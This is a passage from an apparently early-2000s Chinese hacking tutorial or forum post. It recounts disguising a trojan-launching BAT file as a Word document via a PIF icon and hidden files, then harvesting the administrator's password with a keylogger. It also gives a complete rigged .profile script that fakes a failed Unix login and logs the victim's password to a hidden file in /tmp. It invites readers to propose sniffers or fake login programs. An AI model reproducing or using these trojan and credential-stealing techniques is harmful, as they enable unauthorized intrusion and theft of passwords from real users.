看明白了吧?root运行了这个BAT文件实际上就是先运行木马，再调用WINWORD文件打开它想开的这个文件，然后自我删除，也许它机器

　　上WINWORD的位置不同，那调用就会失败，不过不要紧，反正BAT会马上删除，他会以为是自己的误操作。

　　这时你的C驱根目录就有了这么一个BAT文件，它是一个方形的图标，和那个WORD文件大相径庭，root怎么会运行它呢?没关系，在这个

　　文件上点右键，点属性，在“程序”栏选“更改图标”不就行了吗?WORD的图标在你机器c:\progra~1\micros~1\offic中。还要将“运行”

　　改为“最小化”，“退出时关闭”打上勾，这样才能保证在运行时一点迹象也没有。事实上这个BAT文件变成了两个，还有一个PIF文件就是

　　它的图标。

　　把这两个文件传上去：

　　>copy X月工作计划.bat i:

　　>copy X月工作计划.pif i:

　　然后把它的文件和自己的文件都藏起来：

　　>attrib +h X月工作计划.doc

　　>attrib +h X月工作计划.bat

　　这样，root的“公文包”里只剩下一个和原来一模一样的WORD图标，他做梦也没想到这已变成了一个BAT文件。然后可以喘口气了，

　　让我们静静的等……

　　几天后，我进入这个工作站，取下记录下来的击键记录，找出root的口令，进入主机。

　　------------------------------------------------------

　　看明白了吗?这种入侵方法就是对那些铜墙铁壁的主机不是强往里冲而是查操作该主机的root所使用的机器，那是他的“座机”，

　　“舒适”才是他想要的，因此强度也就大大减小。进入他的“座机”后跟踪他的操作，不就轻易的获得钥匙了吗?顺便说一下，其实那个“

　　我的公文包”文件夹的共享是加了口令的，我另费了一番周折才进去，不过这和入侵方式无关，我下回再讲怎么进有口令的共享文件夹。

　　好了，看在我敲得手指发麻的份上，您也该回答我一个问题了：

　　条件：已获得某主机的rootshell，假设名为.fool (-rwsr-xr-x 1 root system 131072 .fool)

　　目标：获得该主机root的帐号

　　提示：方法一:即然已是root，可以装一个sniffer，嗅探口令，不过主机是Digital 4.0B，常见的esniff，dsniff，sniffit都不能运行，

　　你再推荐一个?

　　方法二：做一个假LOGIN的SHELL，将原LOGIN程序改名，收集了帐号的口令后调用真的LOGIN程序，但我发现LOGIN程序一旦改名

　　就不能运行了!

　　方法三：在root的HOME目录中改它的.profile如下：

　　clear

　　echo

　　echo

　　echo "Digital UNIX (lwh000) (ttyp0)"

　　echo

　　echo "login:root"

　　echo "Password:"

　　echo "Login incorrect"

　　echo "login:\c"

　　read lgin

　　stty -echo

　　echo "Password:\c"

　　read pw

　　stty echo

　　echo "Login:$lgin - Pword:$pw" >>/tmp/.autobk

　　echo

　　echo "Last login: Tue Jul 18 11:05:25 from pa1002"

　　echo

　　echo "Digital UNIX V4.0B (Rev. 564); Sat Mar 18 11:02:04 CST 2000"

　　# 中间这一段太长，就不写了，实际上就是伪装主机的欢迎词

　　echo

　　echo

　　# 这以下是root的原.profile

　　PATH=$HOME/bin:${PATH:-/usr/bin:.}

　　export PATH

　　if [ ! "$DT" ]; then

　　stty dec

　　tset -I -Q

　　fi

　　看出来没，实际上root正确登录后，第一句clear擦掉欢迎词，然后伪写登录不成功，让他再输一次，然后记录下来，再伪写上欢迎词，执行正常的.profile内容。

　　但是TELNET反应是较慢的，第一句clear再快也能看出屏幕有一个闪烁，细心的root也许会留意，如果能关掉UNIX的欢迎词就好了，怎么做?

　　当然，只要能达成目标，您尽可以提出您的方法，不要拘泥于我想的这几种。

　　-----------------------------------------------------

　　谈到写信，我再补充几句(!@$#!@%，别砸，真的是最后几句了)，前不久有个家伙给我发了一封信，没名称没地址，只有一个附件

　　look.exe——我有些不明白：你怎么有把握我一定会运行?你又有何后续手段知道我是否运行?你连我是否运行都不知道你的乐趣又从何而

　　来?再就是关于黑别人的邮箱的事，众所周知，我们用的邮箱都是免费的公共邮箱，它的安全性根本就由不得我们做主，你就是黑了它也不

　　能证明水平就一定比我高，更重要的是这种只损人不利已的行为严重违背了黑客的宗旨。我一向是本着“以诚交友，以德服人”的态度面对

　　广大黑友的，所以如果您想和我交友，我举双手双脚赞成;如果您想“整”我，拜托您就当我是个屁——放了算了。嘿嘿，粗俗了点，但是我的心里话。